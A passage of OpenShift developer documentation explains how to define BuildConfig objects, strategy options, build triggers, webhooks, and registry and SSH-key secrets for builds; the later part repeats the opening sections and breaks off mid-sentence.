build configuration is defined by a `*BuildConfig*`, which is a REST object that can be used in a POST to the API server to create a new instance. 
The following example `*BuildConfig*` results in a new build every time a Docker image tag or the source code changes:\n\n.BuildConfig Object Definition\n====\n\n[source,json]\n----\n{\n \"kind\": \"BuildConfig\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-sample-build\" <1>\n },\n \"spec\": {\n \"triggers\": [ <2>\n {\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"ImageChange\"\n }\n ],\n \"source\": { <3>\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n }\n },\n \"strategy\": { <4>\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n },\n \"output\": { <5>\n \"to\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"origin-ruby-sample:latest\"\n }\n }\n }\n}\n----\n\n<1> This specification will create a new `*BuildConfig*` named *ruby-sample-build*.\n<2> You can specify a list of link:#build-triggers[triggers], which cause a new build to be created.\n<3> The `*source*` section defines the source code repository location. You can provide additional options, such as `*sourceSecret*` or `*contextDir*`, here.\n<4> The `*strategy*` section describes the build strategy used to execute the build. You can specify `*Source*`, `*Docker*`, and `*Custom*` strategies here. The above example uses the `*ruby-20-centos7*` Docker image as the builder image for Source-To-Image.\n<5> After the Docker image is successfully built, it will be pushed into the repository described in the `*output*` section.\n====\n\n[[source-to-image-strategy-options]]\n\n== Source-to-Image Strategy Options\n\nThe following options are specific to the link:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[S2I build strategy].\n\n[[s2i-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is available locally on the node, that image will be used. However, to override the local image and refresh it from the registry to which the image stream points, create a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\" <1>\n },\n \"forcePull\": true <2>\n }\n }\n}\n----\n\n<1> The builder image being used, where the local version on the node may not be up to date with the version in the registry to which the image stream points.\n<2> This flag causes the local builder image to be ignored and a fresh version to be pulled from the registry to which the image stream points. Setting `*forcePull*` to *false* results in the default behavior of honoring the image stored locally.\n====\n\n[[incremental-builds]]\n\n=== Incremental Builds\n\nS2I can perform incremental builds, which means it reuses artifacts from previously-built images. To create an incremental build, create a `*BuildConfig*` with the following modification to the strategy definition:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"incremental-image:latest\" <1>\n },\n \"incremental\": true <2>\n }\n }\n}\n----\n\n<1> Specify an image that supports incremental builds. 
The S2I images provided by OpenShift do not implement artifact reuse, so setting `*incremental*` to *true* will have no effect on builds using those builder images.\n<2> This flag controls whether an incremental build is attempted. If the builder image does not support incremental builds, the build will still succeed, but you will get a log message stating that the incremental build was not successful because of a missing *_save-artifacts_* script.\n====\n\n[NOTE]\n====\nSee the link:..\/creating_images\/s2i.html[S2I Requirements] topic for information on how to create a builder image supporting incremental builds.\n====\n\n[[override-builder-image-scripts]]\n\n=== Override Builder Image Scripts\n\nYou can override the *_assemble_*, *_run_*, and *_save-artifacts_* link:..\/creating_images\/s2i.html#s2i-scripts[S2I scripts] provided by the builder image in one of two ways. Either:\n\n1. Provide an *_assemble_*, *_run_*, and\/or *_save-artifacts_* script in the *_.sti\/bin_* directory of your application source repository, or\n\n2. Provide a URL of a directory containing the scripts as part of the strategy definition. For example:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\"\n },\n \"scripts\": \"http:\/\/somehost.com\/scripts_directory\" <1>\n }\n }\n}\n----\n\n<1> This path will have *_run_*, *_assemble_*, and *_save-artifacts_* appended to it. If any or all scripts are found, they will be used in place of the same-named script(s) provided in the image.\n====\n\n[NOTE]\n====\nFiles located at the `*scripts*` URL take precedence over files located in *_.sti\/bin_* of the source repository. See the link:..\/creating_images\/s2i.html[S2I Requirements] topic and the link:https:\/\/github.com\/openshift\/source-to-image\/blob\/master\/docs\/builder_image.md#sti-scripts[S2I documentation] for information on how S2I scripts are used.\n====\n\n[[configuring-the-source-environment]]\n=== Source Environment\n\nThere are two ways to make environment variables available to the link:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[source build] process and resulting image: link:#environment-files[environment files] and link:#buildconfig-environment[*BuildConfig* environment] values.\n\n[[environment-files]]\n\n==== Environment Files\nSource build enables you to set environment values (one per line) inside your application by specifying them in a *_.sti\/environment_* file in the source repository. The environment variables specified in this file are present during the build process and in the final Docker image. The complete list of supported environment variables is available in the link:..\/using_images\/overview.html[documentation] for each image.\n\nIf you provide a *_.sti\/environment_* file in your source repository, S2I reads this file during the build. This allows customization of the build behavior, as the *_assemble_* script may use these variables.\n\nFor example, if you want to disable asset compilation for your Rails application, you can add `*DISABLE_ASSET_COMPILATION=true*` in the *_.sti\/environment_* file to cause asset compilation to be skipped during the build.\n\nIn addition to builds, the specified environment variables are also available in the running application itself. For example, you can add `*RAILS_ENV=development*` to the *_.sti\/environment_* file to cause the Rails application to start in `development` mode instead of `production`.
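\nPutting the two examples together, a minimal *_.sti\/environment_* file for such a Rails application could look like this (both variables are taken from the examples above):\n\n====\n\n----\nDISABLE_ASSET_COMPILATION=true\nRAILS_ENV=development\n----\n====\n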
\n[[buildconfig-environment]]\n\n==== BuildConfig Environment\nYou can add environment variables to the `*sourceStrategy*` definition of the `*BuildConfig*`. The environment variables defined there are visible during the *_assemble_* script execution and will be defined in the output image, making them also available to the *_run_* script and application code.\n\nFor example, to disable asset compilation for your Rails application:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"DISABLE_ASSET_COMPILATION\",\n \"value\": \"true\"\n }\n ]\n }\n}\n----\n====\n\n[[docker-strategy-options]]\n\n== Docker Strategy Options\n\nThe following options are specific to the link:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker build strategy].\n\n[[no-cache]]\n\n=== No Cache\n\nDocker builds normally reuse cached layers found on the host performing the build. Setting the `*nocache*` option to *true* forces the build to ignore cached layers and rerun all steps of the *_Dockerfile_*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"nocache\": true\n }\n }\n}\n----\n====\n\n[[docker-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is available locally on the node, that image will be used. However, to override the local image and refresh it from the registry to which the image stream points, create a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version to be pulled from the registry to which the image stream points. Setting `*forcePull*` to *false* results in the default behavior of honoring the image stored locally.\n====\n\n\n[[custom-strategy-options]]\n\n== Custom Strategy Options\n\nThe following options are specific to the link:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom build strategy].\n\n[[expose-docker-socket]]\n\n=== Expose Docker Socket\n\nTo allow Docker commands to be run and Docker images to be built from inside the build container, the build container must be bound to an accessible socket. Set the `*exposeDockerSocket*` option to *true* to make this occur:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"exposeDockerSocket\": true\n }\n }\n}\n----\n====\n\nifdef::openshift-origin[]\n[[custom-force-pull]]\n\n=== Force Pull\n\nBy default, when setting up the build pod, the build controller checks if the image specified in the build configuration is available locally on the node. If so, that image will be used. However, to override the local image and refresh it from the registry to which the image stream points, create a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version to be pulled from the registry to which the image stream points. 
Setting `*forcePull*` to *false* results in the default behavior of honoring the image stored locally.\n====\nendif::openshift-origin[]\n\n[[using-a-proxy-for-git-cloning]]\n\n== Using a Proxy for Git Cloning\nIf your Git repository can only be accessed using a proxy, you can define the proxy to use in the `*source*` section of the `*BuildConfig*`. You can configure both an HTTP and an HTTPS proxy; both fields are optional.\n\n[NOTE]\n====\nYour source URI must use the HTTP or HTTPS protocol for this to work.\n====\n\n====\n\n[source,json]\n----\n\"source\": {\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"https:\/\/github.com\/openshift\/ruby-hello-world.git\", <1>\n \"httpProxy\" : \"http:\/\/someproxy.com\", <2>\n \"httpsProxy\" : \"https:\/\/someproxy.com\" <3>\n }\n}\n----\n\n<1> Must be an HTTP or HTTPS URI.\n<2> Specify the HTTP proxy to use.\n<3> Specify the HTTPS proxy to use.\n====\n\n[[starting-a-build]]\n\n== Starting a Build\nManually invoke a build using the following command:\n\n----\n$ oc start-build <BuildConfigName>\n----\n\nRe-run a build using the `--from-build` flag:\n\n----\n$ oc start-build --from-build=<buildName>\n----\n\nSpecify the `--follow` flag to stream the build's logs to stdout:\n\n----\n$ oc start-build <BuildConfigName> --follow\n----\n\n[[canceling-a-build]]\n\n== Canceling a Build\nManually cancel a build using the following command:\n\n----\n$ oc cancel-build <buildName>\n----\n\n[[accessing-build-logs]]\n\n== Accessing Build Logs\nTo access the build logs, use the following command:\n\n----\n$ oc build-logs <buildName>\n----\n\n*Log Verbosity*\n\nTo enable more verbose output, pass the `*BUILD_LOGLEVEL*` environment variable as part of the `*sourceStrategy*` or `*dockerStrategy*` in a `*BuildConfig*`:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"BUILD_LOGLEVEL\",\n \"value\": \"2\" <1>\n }\n ]\n }\n}\n----\n\n<1> Adjust this value to the desired log level.\n====\n\nNOTE: A platform administrator can set verbosity for the entire OpenShift instance by passing the `--loglevel` option to the `openshift start` command. If both `--loglevel` and `BUILD_LOGLEVEL` are specified, `BUILD_LOGLEVEL` takes precedence.\n\nAvailable log levels for Source builds are as follows:\n\n[horizontal]\nLevel 0:: Produces output from containers running the *_assemble_* script and all encountered errors. This is the default.\nLevel 1:: Produces basic information about the executed process.\nLevel 2:: Produces very detailed information about the executed process.\nLevel 3:: Produces very detailed information about the executed process, and a listing of the archive contents.\nLevel 5:: Produces everything mentioned at previous levels and additionally provides docker push messages.\n\n[[source-code]]\n\n== Source Code\nThe source code location is one of the required parameters for the `*BuildConfig*`. The build uses this location and fetches the source code that is later built. The source code location definition is part of the `*parameters*` section in the `*BuildConfig*`:\n\n====\n\n----\n{\n \"source\" : {\n \"type\" : \"Git\", <1>\n \"git\" : { <2>\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n },\n \"contextDir\": \"app\/dir\" <3>\n }\n}\n----\n\n<1> The `*type*` field describes which SCM is used to fetch your source code.\n<2> The `*git*` field contains the URI to the remote Git repository of the source code. Optionally, specify the `*ref*` field to check out a specific Git reference. A valid `*ref*` can be a SHA1 tag or a branch name.\n<3> The `*contextDir*` field allows you to override the default location inside the source code repository where the build looks for the application source code. If your application exists inside a sub-directory, you can override the default location (the root folder) using this field.\n====
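\nFor instance, to build from a specific branch instead of the repository default, you could add the `*ref*` field to the `*git*` definition. A small sketch (`beta4` is a hypothetical branch name):\n\n====\n\n----\n{\n \"source\" : {\n \"type\" : \"Git\",\n \"git\" : {\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\",\n \"ref\": \"beta4\"\n }\n }\n}\n----\n====\n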
\n[[build-triggers]]\n\n== Build Triggers\nWhen defining a `*BuildConfig*`, you can define triggers to control the circumstances in which the `*BuildConfig*` should be run. The following build triggers are available:\n\n* link:#webhook-triggers[Webhook]\n* link:#image-change-triggers[Image change]\n* link:#config-change-triggers[Configuration change]\n\n[[webhook-triggers]]\n\n=== Webhook Triggers\nWebhook triggers allow you to trigger a new build by sending a request to the OpenShift API endpoint. You can define these triggers using https:\/\/developer.github.com\/webhooks\/[GitHub webhooks] or Generic webhooks.\n\n*GitHub Webhooks*\n\nhttps:\/\/developer.github.com\/webhooks\/creating\/[GitHub webhooks] handle the call made by GitHub when a repository is updated. When defining the trigger, you must specify a link:..\/dev_guide\/secrets.html[`*secret*`] as part of the URL you supply to GitHub when configuring the webhook. The `*secret*` ensures that only you and your repository can trigger the build. The following example is a trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nThe payload URL is returned as the GitHub Webhook URL by the `describe` command (see link:#describe-buildconfig[below]), and is structured as follows:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/github\n----\n\n*Generic Webhooks*\n\nGeneric webhooks can be invoked from any system capable of making a web request. As with a GitHub webhook, you must specify a `*secret*` when defining the trigger, and the caller must provide this `*secret*` to trigger the build. The following is an example trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nTo set up the caller, supply the calling system with the URL of the generic webhook endpoint for your build:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/generic\n----\n\nThe endpoint can accept an optional payload with the following format, as shown in the invocation sketch below:\n\n====\n\n----\n{\n type: 'git',\n git: {\n uri: '<url to git repository>',\n ref: '<optional git reference>',\n commit: '<commit hash identifying a specific git commit>',\n author: {\n name: '<author name>',\n email: '<author e-mail>',\n },\n committer: {\n name: '<committer name>',\n email: '<committer e-mail>',\n },\n message: '<commit message>'\n }\n}\n----\n====
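\nFor example, a caller could trigger the build with `curl` (a sketch; substitute your own host, namespace, build configuration name, and secret, and note that the payload is optional):\n\n====\n\n----\n$ curl -X POST \\\n -H 'Content-Type: application\/json' \\\n -d '{\"type\": \"git\", \"git\": {\"uri\": \"<url to git repository>\", \"ref\": \"master\"}}' \\\n 'http:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/generic'\n----\n====\n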
\n[[describe-buildconfig]]\n\n*Displaying a BuildConfig's Webhook URLs*\n\nUse the following command to display the webhook URLs associated with a build configuration:\n\n----\n$ oc describe bc <name>\n----\n\nIf the above command does not display any webhook URLs, then no webhook trigger is defined for that build configuration.\n\n[[image-change-triggers]]\n\n=== Image Change Triggers\nImage change triggers allow your build to be automatically invoked when a new version of an upstream image is available. For example, if a build is built on top of a RHEL image, then you can trigger that build to run any time the RHEL image changes. As a result, the application image is always running on the latest RHEL base image.\n\nConfiguring an image change trigger requires the following actions:\n\n. Define an `*ImageStream*` that points to the upstream image you want to trigger on:\n+\n====\n\n----\n{\n \"kind\": \"ImageStream\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-20-centos7\"\n }\n}\n----\n====\n+\nThis defines the image stream that is tied to a Docker image repository located at `_<system-registry>_\/_<namespace>_\/ruby-20-centos7`. The `_<system-registry>_` is defined as a service with the name `docker-registry` running in OpenShift.\n\n. If an image stream is the base image for the build, set the `*from*` field in the build strategy to point to the image stream:\n+\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n }\n}\n----\n====\n+\nIn this case, the `*sourceStrategy*` definition is consuming the `latest` tag of the image stream named `ruby-20-centos7` located within this namespace.\n\n. Define a build with one or more triggers that point to image streams:\n+\n====\n\n----\n{\n \"type\": \"ImageChange\", <1>\n \"imageChange\": {}\n}\n{\n \"type\": \"ImageChange\", <2>\n \"imageChange\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"custom-image:latest\"\n }\n }\n}\n----\n\n<1> An image change trigger that monitors the `*ImageStream*` and `*Tag*` as defined by the build strategy's `*from*` field. The `*imageChange*` part must be empty.\n<2> An image change trigger that monitors an arbitrary image stream. The `*imageChange*` part in this case must include a `*from*` field that references the `*ImageStreamTag*` to monitor.\n====\n\nWhen using an image change trigger for the strategy image stream, the generated build is supplied with an immutable Docker tag that points to the latest image corresponding to that tag. This new image reference will be used by the strategy when it executes for the build. For other image change triggers that do not reference the strategy image stream, a new build will be started, but the build strategy will not be updated with a unique image reference.\n\nIn the example above that has an image change trigger for the strategy, the resulting build will be:\n\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"172.30.17.3:5001\/mynamespace\/ruby-20-centos7:immutableid\"\n }\n }\n }\n}\n----\n====\n\nThis ensures that the triggered build uses the new image that was just pushed to the repository, and the build can be re-run any time with the same inputs.\n\nIn addition to setting the image field for all `*Strategy*` types, for custom builds the `OPENSHIFT_CUSTOM_BUILD_BASE_IMAGE` environment variable is checked. If it does not exist, then it is created with the immutable image reference. If it does exist, then it is updated with the immutable image reference.\n\nIf a build is triggered due to a webhook trigger or manual request, the build that is created uses the `*immutableid*` resolved from the `*ImageStream*` referenced by the `*Strategy*`.
This ensures that builds are performed using consistent image tags for ease of reproduction.\n\n[NOTE]\n====\nImage streams that point to Docker images in v1 Docker registries will only trigger a build once, when the image stream tag becomes available, and not on subsequent image updates. This is due to the lack of uniquely identifiable images in v1 Docker registries.\n====\n\n[[config-change-triggers]]\n=== Configuration Change Triggers\nA configuration change trigger allows a build to be automatically invoked as soon as a new `*BuildConfig*` is created. The following is an example trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"ConfigChange\"\n}\n----\n\n====\n\n[NOTE]\n====\nConfiguration change triggers currently only work when creating a new `*BuildConfig*`. In a future release, configuration change triggers will also be able to launch a build whenever a `*BuildConfig*` is updated.\n====\n\n[#using-docker-credentials-for-pushing-and-pulling-images]\n== Using Docker Credentials for Pushing and Pulling Images\n\nSupply a *_.dockercfg_* file with valid Docker registry credentials in order to push the output image into a private Docker registry or pull the builder image from a private Docker registry that requires authentication. For the OpenShift Docker registry, you do not have to do this, because `*secrets*` are generated automatically for you by OpenShift.\n\nThe *_.dockercfg_* JSON file is found in your home directory by default and has the following format:\n\n====\n\n----\n{\n\t\"https:\/\/index.docker.io\/v1\/\": { <1>\n\t\t\"auth\": \"YWRfbGzhcGU6R2labnRib21ifTE=\", <2>\n\t\t\"email\": \"user@example.com\" <3>\n\t}\n}\n----\n\n<1> URL of the registry.\n<2> Base64-encoded credentials.\n<3> Email address for the login.\n====\n\nYou can define multiple Docker registry entries in this file. Alternatively, you can also add authentication entries to this file by running the `docker login` command; the file will be created if it does not exist. Kubernetes provides https:\/\/github.com\/GoogleCloudPlatform\/kubernetes\/blob\/master\/docs\/design\/secrets.md[`*secrets*`], which are used to store your configuration and passwords.\n\n. Create the `*secret*` from your local *_.dockercfg_* file:\n+\n====\n----\n$ oc secrets new dockerhub ~\/.dockercfg\n----\n====\n+\nThis generates a JSON specification of the `*secret*` named *dockerhub* and creates the object.\n\n. Once the `*secret*` is created, add it to the builder service account:\n+\n====\n----\n$ oc secrets add serviceaccount\/builder secrets\/dockerhub\n----\n====\n\n. Add a `*pushSecret*` field into the `*output*` section of the `*BuildConfig*` and set it to the name of the `*secret*` that you created, which in the above example is *dockerhub*:\n+\n====\n\n----\n{\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"private-image\"\n },\n \"pushSecret\":{\n \"name\": \"dockerhub\"\n }\n }\n }\n}\n----\n====\n
\n. Pull the builder Docker image from a private Docker registry by specifying the `*pullSecret*` field, which is part of the build strategy definition:\n+\n====\n\n----\n{\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"docker.io\/user\/private_repository\"\n },\n \"pullSecret\": {\n \"name\": \"dockerhub\"\n }\n },\n \"type\": \"Source\"\n }\n}\n----\n====\n\n[#using-private-repositories-for-builds]\n== Using Private Repositories for Builds\n\nSupply valid credentials to build an application from a private repository. Currently, only SSH key-based authentication is supported. The repository keys are located in the `$HOME\/.ssh\/` directory, and are named `id_dsa.pub`, `id_ecdsa.pub`, `id_ed25519.pub`, or `id_rsa.pub` by default. Generate SSH key credentials with the following command:\n\n====\n\n----\n$ ssh-keygen -t rsa -C \"your_email@example.com\"\n----\n====\n\nTwo files are created: the public key and a corresponding private key (one of `id_dsa`, `id_ecdsa`, `id_ed25519`, or `id_rsa`). With both of these in place, consult your source control management (SCM) system's manual on how to upload the public key. The private key will be used to access your private repository.\n\nA link:..\/dev_guide\/secrets.html[`*secret*`] is used to store your keys.\n\n. Create the `*secret*` before using the SSH key to access the private repository:\n+\n====\n----\n$ oc secrets new scmsecret ssh-privatekey=$HOME\/.ssh\/id_rsa\n----\n====\n\n. Add the `*secret*` to the builder service account:\n+\n====\n\n----\n$ oc secrets add serviceaccount\/builder secrets\/scmsecret\n----\n====\n\n. Add a `*sourceSecret*` field into the `*source*` section inside the `*BuildConfig*` and set it to the name of the `*secret*` that you created, in this case `*scmsecret*`:\n+\n====\n\n----\n{\n \"apiVersion\": \"v1\",\n \"kind\": \"BuildConfig\",\n \"metadata\": {\n \"name\": \"sample-build\"\n },\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"sample-image\"\n }\n },\n \"source\": {\n \"git\": {\n \"uri\": \"git@repository.com:user\/app.git\" <1>\n },\n \"sourceSecret\": {\n \"name\": \"scmsecret\"\n },\n \"type\": \"Git\"\n },\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"python-33-centos7:latest\"\n }\n },\n \"type\": \"Source\"\n }\n }\n}\n----\n<1> The URL of the private repository is usually in the form `git@example.com:<username>\/<repository>`.\n====
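\nWith the secret wired into the build configuration, you can trigger a build and watch the logs to confirm that the source is cloned over SSH. A usage sketch, assuming the `sample-build` configuration above:\n\n====\n\n----\n$ oc start-build sample-build --follow\n----\n====\n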
The\nfollowing example `*BuildConfig*` results in a new build every time a Docker\nimage tag or the source code changes:\n\n.BuildConfig Object Definition\n====\n\n[source,json]\n----\n{\n \"kind\": \"BuildConfig\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-sample-build\" <1>\n },\n \"spec\": {\n \"triggers\": [ <2>\n {\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"ImageChange\"\n }\n ],\n \"source\": { <3>\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n }\n },\n \"strategy\": { <4>\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n },\n \"output\": { <5>\n \"to\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"origin-ruby-sample:latest\"\n }\n }\n }\n}\n----\n\n<1> This specification will create a new `*BuildConfig*` named\n*ruby-sample-build*.\n<2> You can specify a list of link:#build-triggers[triggers], which cause a new\nbuild to be created.\n<3> The `*source*` section defines the source code repository location. You can\nprovide additional options, such as `*sourceSecret*` or `*contextDir*` here.\n<4> The `*strategy*` section describes the build strategy used to execute the\nbuild. You can specify `*Source*`, `*Docker*` and `*Custom*` strategies here.\nThis above example uses the `*ruby-20-centos7*` Docker image that\nSource-To-Image will use for the application build.\n<5> After the Docker image is successfully built, it will be pushed into the\nrepository described in the `*output*` section.\n====\n\n[[source-to-image-strategy-options]]\n\n== Source-to-Image Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[S2I\nbuild strategy].\n\n[[s2i-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\" <1>\n },\n \"forcePull\": true <2>\n }\n }\n}\n----\n\n<1> The builder image being used, where the local version on the node may not be\nup to date with the version in the registry to which the image stream points.\n<2> This flag causes the local builder image to be ignored and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n[[incremental-builds]]\n\n=== Incremental Builds\n\nS2I can perform incremental builds, which means it reuses artifacts from\npreviously-built images. To create an incremental build, create a\n`*BuildConfig*` with the following modification to the strategy definition:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"incremental-image:latest\" <1>\n },\n \"incremental\": true <2>\n }\n }\n}\n----\n\n<1> Specify an image that supports incremental builds. 
The S2I images provided\nby OpenShift do not implement artifact reuse, so setting `*incremental*` to\n*true* will have no effect on builds using those builder images.\n<2> This flag controls whether an incremental build is attempted. If the builder\nimage does not support incremental builds, the build will still succeed, but you\nwill get a log message stating the incremental build was not successful because\nof a missing *_save-artifacts_* script.\n====\n\n[NOTE]\n====\nSee the link:..\/creating_images\/s2i.html[S2I Requirements] topic for information\non how to create a builder image supporting incremental builds.\n====\n\n[[override-builder-image-scripts]]\n\n=== Override Builder Image Scripts\n\nYou can override the *_assemble_*, *_run_*, and *_save-artifacts_*\nlink:..\/creating_images\/s2i.html#s2i-scripts[S2I scripts] provided by the\nbuilder image in one of two ways. Either:\n\n1. Provide an *_assemble_*, *_run_*, and\/or *_save-artifacts_* script in the\n*_.sti\/bin_* directory of your application source repository, or\n\n2. Provide a URL of a directory containing the scripts as part of the strategy\ndefinition. For example:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\"\n },\n \"scripts\": \"http:\/\/somehost.com\/scripts_directory\" <1>\n }\n }\n}\n----\n\n<1> This path will have *_run_*, *_assemble_*, and *_save-artifacts_* appended\nto it. If any or all scripts are found they will be used in place of the same\nnamed script(s) provided in the image.\n====\n\n[NOTE]\n====\nFiles located at the `*scripts*` URL take precedence over files located in\n*_.sti\/bin_* of the source repository. See the\nlink:..\/creating_images\/s2i.html[S2I Requirements] topic and the\nlink:https:\/\/github.com\/openshift\/source-to-image\/blob\/master\/docs\/builder_image.md#sti-scripts[S2I\ndocumentation] for information on how S2I scripts are used.\n====\n\n[[configuring-the-source-environment]]\n=== Source Environment\n\nThere are two ways to make environment variables available to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[source build]\nprocess and resulting \\image: link:#environment-files[environment files] and\nlink:#buildconfig-environment[*BuildConfig* environment] values.\n\n[[environment-files]]\n\n==== Environment Files\nSource build enables you to set environment values (one per line) inside your\napplication, by specifying them in a *_.sti\/environment_* file in the source\nrepository. The environment variables specified in this file are present during\nthe build process and in the final docker image. The complete list of supported\nenvironment variables is available in the\nlink:..\/using_images\/overview.html[documentation] for each image.\n\nIf you provide a *_.sti\/environment_* file in your source repository, S2I reads\nthis file during the build. This allows customization of the build behavior as\nthe *_assemble_* script may use these variables.\n\nFor example, if you want to disable assets compilation for your Rails\napplication, you can add `*DISABLE_ASSET_COMPILATION=true*` in the\n*_.sti\/environment_* file to cause assets compilation to be skipped during the\nbuild.\n\nIn addition to builds, the specified environment variables are also available in\nthe running application itself. 
For example, you can add\n`*RAILS_ENV=development*` to the *_.sti\/environment_* file to cause the Rails\napplication to start in `development` mode instead of `production`.\n\n[[buildconfig-environment]]\n\n==== BuildConfig Environment\nYou can add environment variables to the `*sourceStrategy*` definition of the\n`*BuildConfig*`. Defined environment variables are visible during the *_assemble_*\nscript execution and will be defined in the output image, making them also\navailable to the *_run_* script and application code.\n\nFor example disabling assets compilation for your Rails application:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"DISABLE_ASSET_COMPILATION\",\n \"value\": \"true\"\n }\n ]\n }\n}\n----\n====\n\n[[docker-strategy-options]]\n\n== Docker Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker\nbuild strategy].\n\n[[no-cache]]\n\n=== No Cache\n\nDocker builds normally reuse cached layers found on the host performing the\nbuild. Setting the `*nocache*` option to *true* forces the build to ignore\ncached layers and rerun all steps of the *_Dockerfile_*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"nocache\": true\n }\n }\n}\n----\n====\n\n[[docker-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified 